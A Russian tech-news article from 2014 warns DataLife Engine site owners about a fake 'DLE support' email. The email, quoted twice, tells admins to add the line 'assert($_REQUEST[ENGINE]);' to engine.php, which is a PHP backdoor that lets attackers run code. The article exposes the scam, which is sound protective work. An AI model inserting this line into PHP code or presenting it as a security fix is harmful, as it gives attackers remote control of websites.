Про социальные сети и сервисы:
Возможно, это заинтересует:
Рекомендуем:
Недавно на сайте смотрели:
Новый вид мошенничества в Интернете – ложные антивирусы
Как известно, мошенникам, которые орудуют в Интернете, сейчас стало не очень-то легко, так как они уже все легкие способы мошенничества испробовали и многие ...
В App Store цензорами удален проект с огромным финансированием
Для довольно большого количества так называемых сторонних разработчиков популярный торговый сервис App Store может стать как основным инструментом постоянного ...
Принтер HP DeskJet F4213 – отличный выбор
Если вы в поисках универсального оборудования, которое за относительно небольшие деньги станет отличным помощником для вас в таких операциях как печать, копии ...
Xiaomi опережает Apple в производств смартфонов
Xiaomi обогнала Apple и стала вторым по величине производителем смартфонов в мире. Китайский производитель смартфонов извлек выгоду из кончины местного ...
Самсунг презентовал ультрабуки на платформе Windows 8
Корпорация Самсунг презентовала следующее поколение модели функциональных планшетов Series 7 Ultra, Series 7 Chronos работающих с Windows 8. Пока нет полной ...
5 499
DLE: Сообщение с темой "Ваш сайт **** может быть взломан!"
категория: Интернет технологиидата: 4 ноября 2014
Несомненно, движок DataLife Engine является весьма популярным среди владельцев разнонаправленных Интернет-ресурсов. В последние годы внимание к нему становится все выше, выходят новые версии, дополнения и модули для ДЛЕ. Это все привлекает и нехороших людей, проще говоря - мошенников. С одним из таких случаев, недавно смогли столкнуться многие обладатели ресурсов на этой системе управления.
Ваш DLE-сайт может быть взломан
Наверняка, некоторые владельцы сайтов на популярной CMS DLE уже столкнулись с подобным сообщением на почту:
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте ***** нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: *****/engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_REQUEST[ENGINE]);
С уважением,
Служба поддержки «DataLife Engine»
Благодарим Вас за использование на Вашем сайте ***** нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: *****/engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_REQUEST[ENGINE]);
С уважением,
Служба поддержки «DataLife Engine»
Что делать вебмастеру?
Однако, в целях реальной безопасности Вашего сайта крайне не рекомендуется следовать совету из этого сообщения, так как ничего общего с разработчиками DLE оно не имеет и рассылается не ими, а злоумышленниками, которые постредством подобной манипуляции могут навредить (мягко говоря) работе ресурса. Так, используя полученную уязвимость, с помощью PHP-сценария может формироваться POST-пакет для последующей возможной отправки файла с некоторым PHP-кодом. Ну а дальше уже дело фантазии.
Кроме того, стоит иметь ввиду, что подобные сообщения отправляются посредством обратной связи на сайте и по адресам электронной почты, не имеющим никакого отношения к адресам, на которые зарегистрированы лицензионные копии ДЛЕ на сайте разработчика. При отправке письма используются проксовые айпи адреса, либо TOR.
Если у Вас все-таки возникли обоснованные сомнения по поводу безопасности Вашего сайта на ДЛЕ, то:
1. Если используется нулль-версия, рассмотрите вариант перехода на лицензию.
2. Если первый вариант не подходит, обновите вашу CMS DataLife Engine до последней актуальной версии. Разработчики постоянно занимаются модернизацией и усовершенствованием этого движка, в том числе и в плане безопасности.
3. Все выявленные уязвимости DLE и выпущенные баг-фиксы размещаются на странице официального сайта CMS DataLife Engine. Отслеживайте эту информацию именно там.
Будьте внимательны, чтобы лишний раз не давать возможностей для взлома Вашего сайта.
Возможно, Вас заинтересуют похожие тематические статьи и рекомендации:
- Способы монетизации сайтов-сателлитовСуществуют сателлиты, которые предназначены для заработка, или же поддерживающие основной проект. В случае, если Вы решили зарабатывать именно на сателлитах, Вам необходимо узнать, каким образом
- Как выбрать хостинговую компанию для JoomlaНа сегодняшний день, существует большое количество хостинговых компаний, предлагающих хостинг для joomla. Поэтому, многие владельцы сайтов, сталкиваются с проблемой выбора хостинг - провайдера. Для
- Как повысить посещаемость своего сайта?Всё чаще такой вопрос интересует пользователей Интернета, как это видно с помощью ресурсов поисковых систем. Всё чаще люди спрашивают «Как создать свой сайт», «Как повысить посещаемость» и так
- В Беларуси заблокирован один из популярнейший медийных ресурсов Хартия 97В Беларуси с 24 января 2018 года начал блокироваться один из популярнейших Интернет-ресурсов оппозиционного характера Хартия 97". Медийный проект занимал значительную нишу в белорусском
- Важность контента для сайтаКогда веб-мастер создаёт свой сайт, его задачей становится раскрутка своего ресурса. Основой этого процесса является контент, или его содержимое – то, за чем и заходят на сайт посетители. Если
- "В Контакте" или "Одноклассники". Битва социальных сетейЗдравствуйте, дорогие читатели! В данной статье речь пойдет о двух самых крупнейших социальных сетях в России «В Контакте» и «Одноклассники». Как вы уже знаете, данные сети пользуются высоким
- Что такое «копипастный» сайт и «сапа-сайты»?В поисках видов заработка в интернете многие создают сайты и вкладывают в них силы, время, средства и душу. Такие веб-мастера зарабатывают, в конце концов, приличные деньги, если не сдаются. Однако
- Детали создания главной страницы сайтаОформление главной страницы сайта – очень важная задача, правильное выполнение который сделает сайт более популярным и успешным. Рассмотрим, о чём важно помнить и каких распространённых ошибок стоит
- Обзор популярных конструкторов сайтов РунетаФункциональные возможности конструкторов сайтов давно сравнимы с полноценными CMS. Их основное отличие от последних – максимальная простота использования. Конечно, совместить такие качества
- Почему стоит использовать CMS Joomla?Если вы планируете в скором времени создать свой сайт, но пока что совершенно не разбираетесь в программировании, то это не беда. На счастье вам и не только вам, одни из самых лучших разработчиков
Темы, отмеченные пользователями:
7 самых бесполезных переносных устройств-гаджетов
Среди переносных электронных устройств – т.н. гаджетов – из всех этих миллионов и миллиардов нужных и полезных «штучек» существует тонкая прослойка совершенно бесполезных устройств, которые могут пригодиться разве что для розыгрыша друга или тупого подарка на день рождения. Среди всей этой массы бесполезных и зачастую непонятных устройств есть свои уникумы, с «великолепной» семёркой которых вы сейчас имеете счастье познакомиться поближе.
Как включить и настроить iMessage на iPhone и iPad
iMessage – это услуга корпорации Apple для передачи моментальными сообщениями. В отличие от SMS, за информацию переданную iMessage не берется плата с юзера. С их помощью возможно переписываться со своими знакомыми, у каких есть хоть какое устройство от знаменитой компании Apple. Для передачи iMessage сообщениями обязательно нужен доступ к веб-сервисам, другими словами WiFi или 3G на всех устройствах, начав с iPod и оканчивая Mac.
Nexus 6: новый флагман Google
Как-то скромненько и, можно сказать, втихую прошла недавно презентация нового флагманского смартфона от Google – модели Nexus 6. Как и предполагалось ранее, Nexus 6 собирала компания Motorola и поэтому стали ясны проявления дизайна смартфонов компании в новом творении для Google. С первого взгляда кажется, что в руках не новый Nexus 6, а слегка «подобревший» Moto X: та же эмблема компании, те же размеры от края экрана до края смартфона – в-общем, впечатление двоякое. К тому же с первого раза и не понять, где именно верх, а где низ у Nexus 6: мельком взглянув на переднюю панель девайса